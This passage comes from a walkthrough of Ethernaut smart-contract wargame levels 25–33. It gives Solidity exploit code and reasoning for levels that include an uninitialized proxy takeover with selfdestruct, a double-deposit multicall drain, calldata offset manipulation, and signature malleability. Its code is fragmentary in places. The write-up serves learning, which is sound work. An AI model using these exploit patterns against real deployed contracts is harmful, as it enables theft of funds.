multicall1Params[0] = depositCalldata;
bytes memory multicall1CallData = abi.encodeWithSignature("multicall(bytes[])", multicall1Params);

// bundle deposit (again) and multicall_1
bytes[] memory multicall0Params = new bytes[](2);
multicall0Params[0] = depositCalldata;    // reusing deposit
multicall0Params[1] = multicall1CallData; // are you confused enough?

As we tricked the balance with the same deposit, twice, we can just drain

// as our balance is 0.002, we can call execute(), draining the contract
// don't forget to set up receive() in this contract
bytes memory b;
target.execute(address(this), 0.002 ether, b);

Complete the level

// and now we can modify slot1 which is admin/maxBalance


25 Motor Bike

To beat this level, we need to comply with


As engines[address(motorbike)] = address(engine), the level wants us to destroy the engine.



A solution would be then, to upgrade the engine of the motorbike, and call its selfdestruct function.

We can upgrade the contact with _upgradeToAndCall(), which is guarded by _authorizeUpgrade(), that controls that

require(msg.sender == upgrader, "Can't upgrade")

How do we become upgraders?

Notice that Engine inherits from Initializable, which uses a initialize() function as a sort of constructor. The implementation of initialize() here is,

function initialize() external initializer {
    horsePower = 1000;
    upgrader = msg.sender;

The implementers missed a critical part here, which is commented in the documentation of the initializers:

However, while Solidity ensures that a constructor is called only once in the lifetime of a contract, a regular function can be called many times. To prevent a contract from being initialized multiple times, you need to add a check to ensure the initialize function is called only once:

In other words, we can just call initialize() and become the upgrader.

Finding out the address of the engine

So where is the engine contract? Look at both the Motorbike and Engine contracts which go by EIP 1967:

// keccak-256 hash of "eip1967.proxy.implementation" subtracted by 1
bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

Putting all together

We need the evil engine

contract SelfDestructableEngine {
  function attack() external {

and we upgrade and call it at the setUp() stage

// create your evil engine
SelfDestructableEngine evilEngine = new SelfDestructableEngine();

// initialize to become the owner
// upgrade to the evil engine, call the selfdestruct() attack
engine.upgradeToAndCall(address(evilEngine), abi.encodeWithSignature("attack()"));


function testExploit() public {
  // setUp() and testExploit() happen at different transactions,
  // we need to run our exploit at setUp() to be able to verify.


26 Double Entry Point

To beat this level, we need to comply with

// setting a forta bot
address usersDetectionBot = address(forta.usersDetectionBots(_player));
if(usersDetectionBot == address(0)) return false;

// making a "sweep" fail
(bool ok, bytes memory data) = this.__trySweep(cryptoVault, instance);
require(!ok, "Sweep succeded");

// making a condition true (see 4 lines below)
bool swept = abi.decode(data, (bool));
return swept;

// the condition to be true
return(false, abi.encode(instance.balanceOf(instance.cryptoVault()) > 0));

Lot to unpack:

  • Set a forta bot.
  • Make a "sweep" fail.
  • Make sure the balance of this particular token in the vault is greater than 0.


The "Sweep"

The contract CryptoVault allows anybody to sweep tokens to a recipient address, as long as it's not the declared underlying one.

function sweepToken(IERC20 token) public {
    require(token != underlying, "Can't transfer underlying token");
    token.transfer(sweptTokensRecipient, token.balanceOf(address(this)));

The Delegation

The contract LegacyToken has some sort of update system that allows to delegateToNewContract(). Then, if this delegate variable is set, it will run a delegated transfer

function transfer(address to, uint256 value) public override returns (bool) {
    if (address(delegate) == address(0)) {
        return super.transfer(to, value);
    } else {
        return delegate.delegateTransfer(to, value, msg.sender);

The bug here for the CryptoVault is that, while it can prevent to engage in "sweeps" over the new delegated token, it cannot prevent "sweeps" if a user gives the address of the old token.

The Forta Bot

DoubleEntryPoint has a modifier that calls a detection bot to notify() on the call of the delegateTransfer() function, now this modifier, in case it sees an alert has been raised, will revert the execution.

modifier fortaNotify() {
  address detectionBot = address(forta.usersDetectionBots(player));

  // Cache old number of bot alerts
  uint256 previousValue = forta.botRaisedAlerts(detectionBot);

  // Notify Forta

  // Continue execution

  // Check if alarms have been raised
  if(forta.botRaisedAlerts(detectionBot) > previousValue) revert("Alert has been triggered, reverting");

Putting a solution together

This is the simplest part, as once we see how the pieces fit together, we don't need to guarantee other thing than this sweep fails. Then we build the following bot

contract DetectionBot {
  IForta forta;

  constructor(address _fortaAddress) {
    forta = IForta(_fortaAddress);

  // this is the simplest solution:
  // we just want _any_ transfer to fail in this level.
  // if we were to add some logic, we need to examine the second parameter,
  // to allow some transactions, while preventing others.
  function handleTransaction(address user, bytes calldata) public {

A more complex bot examining would be needed if we need to guarantee the functioning of the transfer outside the CryptoVault.


27 Good Samaritan

To beat this level, we need to comply with

instance.coin().balances(address(instance.wallet())) == 0


Let's look at GoodSamaritan.requestDonation()

function requestDonation() external returns(bool enoughBalance){
  // donate 10 coins to requester
  try wallet.donate10(msg.sender) {
    return true;
  } catch (bytes memory err) {
    if (keccak256(abi.encodeWithSignature("NotEnoughBalance()")) == keccak256(err)) {
      // send the coins left
      return false;

If donate10() reverts, and the custom error is NotEnoughBalance(), then the GoodSamaritan contract will call wallet.transferRemainder. How do we produce this consume error?

Notice that Coin.transfer(), calls the notify() function of the funds recipient.

if(dest_.isContract()) {
  // notify contract

That is, we can get to implement this function as desired. Then we just send the needed error.

error NotEnoughBalance();

// ... SNIP

// goodSamaritan.requestDonation() will transfer the remainder
// if the error NotEnoughBalance() is received.
// just make sure to not revert when you are getting the remainder!
// In this particular case, checking the amount will suffice.
function notify(uint256 amount) public pure {
  if (amount == 10) {
    revert NotEnoughBalance();


28 Gatekeeper Three

To beat this level, we need to comply with

instance.entrant() == _player


  • gateOne

    • Just invoke GateKeeperThree.construct0r()
  • gateTwo

    • Invoke GateKeeperThree.createTrick()
    • Then GatekeeperThree.getAllowance(block.timestamp)
  • gateThree

    • Send 0.001000000000000001 ether
    • Do not implement receive() so a transfer to you fails.


29 Switch

To beat this level, we need to comply with



We want to make switchOn true.

The only way is by using the function turnSwitchOn(), which has an onlyThis modifier, which leave us with calling flipSwitch(bytes memory), which has a curious modifier

modifier onlyOff() {
    // we use a complex data type to put in memory
    bytes32[1] memory selector;
    // check that the calldata at position 68 (location of _data)
    assembly {
        calldatacopy(selector, 68, 4) // grab function selector from calldata
        selector[0] == offSelector,
        "Can only call the turnOffSwitch function"

In short, takes the calldata, and checks the method called. The election of the byte 68 is due to how calldata is structured for one byte parameter, for example, calling flipSwitch() passing turnSwitchOff() in solidity would be

bytes memory switchCalldata = abi.encodeWithSignature("turnSwitchOff()");

And the calldata would be

0x30c13ade                                                        // selector
0000000000000000000000000000000000000000000000000000000000000020  // 20h = 32d bytes from the selector to the start of data
0000000000000000000000000000000000000000000000000000000000000004  // 4 bytes, length of the `bytes` type (data "started" here)
20606e1500000000000000000000000000000000000000000000000000000000  // the actual data -> 0x20606e15

So we need to maintain this byte 68 in the calldata, but finding a way to passing the selector of turnSwitchOn() to beat this level.

Abusing the offset

Let's look at calldata again

0x30c13ade                                                        // selector
0000000000000000000000000000000000000000000000000000000000000020  // 20h = 32d bytes from the selector to the start of data
0000000000000000000000000000000000000000000000000000000000000004  // 4 bytes, length of the `bytes` type (data "started" here)
20606e1500000000000000000000000000000000000000000000000000000000  // the actual data -> 0x20606e15

This selector 0x30c13ade tells to the contract "execute the function flipSwitch(bytes memory)". The next thing is looking at the next 32 bytes. As the type is dynammic, this word give us the offset, that is, where do I start reading the variable. In this case is 0x20 bytes. If we modify it to 0x60 bytes, it will skip the next 2 words, and read the next chink of data.

Crafting the calldata like this:

0x30c13ade                                                        // selector
0000000000000000000000000000000000000000000000000000000000000060  // 60h = 96d bytes from the selector to the start of data

0000000000000000000000000000000000000000000000000000000000000004  // i will not look for my bytes here....
20606e1500000000000000000000000000000000000000000000000000000000  // ....

0000000000000000000000000000000000000000000000000000000000000004  // But I will start reading my 4 bytes HERE
76227e1200000000000000000000000000000000000000000000000000000000  // then _data becomes 0x76227e12

Complying with the modifier, as the byte 68 is still the expected one. And giving the selector for turnSwitchOn(), which solves the level.

We leverage assembly to solve the level

bytes4 flipSelector = bytes4(keccak256("flipSwitch(bytes)"));
bytes32 offSelectorData = bytes32(bytes4(keccak256("turnSwitchOff()")));
bytes32 onSelectorData = bytes32(bytes4(keccak256("turnSwitchOn()")));

bytes memory switchCalldata = new bytes(4 + 5 * 32);
assembly {
    mstore(add(switchCalldata, 0x20), flipSelector)
    // calldata tells the EVM: "The bytes variable is in 0x60 bytes forward"
    mstore(add(switchCalldata, 0x24), 0x0000000000000000000000000000000000000000000000000000000000000060)
    // length of the bytes data (that we are not using in this exploit) but for the modifier
    mstore(add(switchCalldata, 0x44), 0x0000000000000000000000000000000000000000000000000000000000000004)
    mstore(add(switchCalldata, 0x64), offSelectorData)
    // length of the actual bytes data we are using
    mstore(add(switchCalldata, 0x84), 0x0000000000000000000000000000000000000000000000000000000000000004)
    mstore(add(switchCalldata, 0xa4), onSelectorData)

(bool success,) =;


30 Higher Order

To beat this level, we need to comply with

instance.commander() == _player;


The function claimLeadership() allows the player to become the commander, provided that the value of the treasury variable exceeds 255.

function claimLeadership() public {
    if (treasury > 255) commander = msg.sender;
    else revert("Only members of the Higher Order can become Commander");

The issue is that the function responsible for updating the treasury variable takes an input parameter of type uint8.

function registerTreasury(uint8) public {
    assembly {
        sstore(treasury_slot, calldataload(4))

Here, calldataload(p) reads 32 bytes from calldata starting at the specified offset p. The value is then written directly into the designated storage slot using sstore(). However, sstore() does not enforce type restrictions on the value being stored. This allows us to bypass the uint8 constraint and provide a value greater than 255. For instance, we can use 0x0100, which exceeds the maximum value of 0xff (255 in decimal).


The following exploit demonstrates how to achieve this:

function testExploit() public {
  (bool success,) ="registerTreasury(uint8)", uint16(0x100)));
  require(success, "registerTreasury failed");

  (success,) ="claimLeadership()"));
  require(success, "claimLeadership failed");



31 Stake

To beat this level, we need to comply with

stakeAddress.balance != 0 &&
stake.totalStaked() > stakeAddress.balance &&
stake.UserStake(_player) == 0 &&

In words:

  • The Stake contract's ETH balance has to be greater than 0.
  • totalStaked must be greater than the Stake contract's ETH balance.
  • You must be a staker.
  • Your staked balance must be 0.


Three points:

  • StakeWETH() will write totalStaked, UserStake, and Stakers even if the WETH transaction fails.
  • Unstake() will write UserStake and totalStaked even if the ETH transfer fails.
  • You want to assist yourself with a contract to inflate the Staker's stake balance.

See in code documentation for the implementation.

contract StakeTest is Test {
  address private challengeAddress;

  function setUp() public {
    challengeAddress = utils.createLevelInstance(0x32FFB8d4244B350F5D3E074e9b731A135531B975);

  function testExploit() public {
    // Makes
    //   stakeAddress.balance != 0
    IStaker(challengeAddress).StakeETH{value: 0.001 ether + 1 wei}();

    // Makes
    //  stake.UserStake(_player) == 0
    // but since this contract's `receive()` reverts, keeps
    //  stakeAddress.balance != 0
    IStaker(challengeAddress).Unstake(0.001 ether + 1 wei);

    // We need the help of this contract to inflate
    // the Staker's stake balance
    AttackAssistant attackAssistant = new AttackAssistant(challengeAddress);


  receive() external payable {
    // This one helps with the condition
    //   "Your staked balance must be 0.""
    revert("Not receiving funds here.");

contract AttackAssistant {
  address private challengeAddress;

  constructor(address _challengeAddress) payable {
    challengeAddress = _challengeAddress;

  function attack() external {
    // Stakes unexisting funds
    // (We do not have 0.001 ether + 2 wei in WETH)
    // Makes
    //    stake.totalStaked() > stakeAddress.balance
    address wethAddress = IStaker(challengeAddress).WETH();
    IWETH(wethAddress).approve(challengeAddress, type(uint256).max);
    IStaker(challengeAddress).StakeWETH(0.001 ether + 2 wei);


32 Impersonator

To beat this level, we need to comply with

ECLocker locker = instance.lockers(0);


function testExploit() public {
  // In this challenge, we can change the lock's controller if we supply a valid signature
  // whose (r, s, v) tuple has not been used before.
  // Signature Malleability Attack:
  // The vulnerability is that the contract does not enforce that `s` is in the lower half of the curve order,
  // as required by EIP-2. This allows us to "flip" the `s` value (and adjust `v` accordingly) to create
  // an alternative valid signature that bypasses the replay protection.

  // value `r` (from the factory signature)
  bytes32 r = bytes32(uint256(11397568185806560130291530949248708355673262872727946990834312389557386886033));
  // value `s` (from the factory and flipped)
  bytes32 s = bytes32(SECP256K1_N - uint256(54405834204020870944342294544757609285398723182661749830189277079337680158706));
  // value `v` (modified from 27 -> 28)
  uint8 v = 28;

  // Get the initial value
  address lockerAddress = IImpersonator(challengeAddress).lockers(0);
  assertEq(IECLocker(lockerAddress).controller(), 0x42069d82D9592991704e6E41BF2589a76eAd1A91);

  // Execute the attack
  IECLocker(lockerAddress).changeController(v, r, s, address(0));

  // Check the new controller value
  assertEq(IECLocker(lockerAddress).controller(), address(0));

  // Submit the solution


    • All transaction signatures whose s-value is greater than secp256k1n/2 are now considered invalid.
    • Allowing transactions with any s value with 0 < s < secp256k1n, as is currently the case, opens a transaction malleability concern, as one can take any transaction, flip the s value from s to secp256k1n - s, flip the v value (27 -> 28, 28 -> 27), and the resulting signature would still be valid.

33 Magical Animal Carousel

To beat this level, we need to comply with


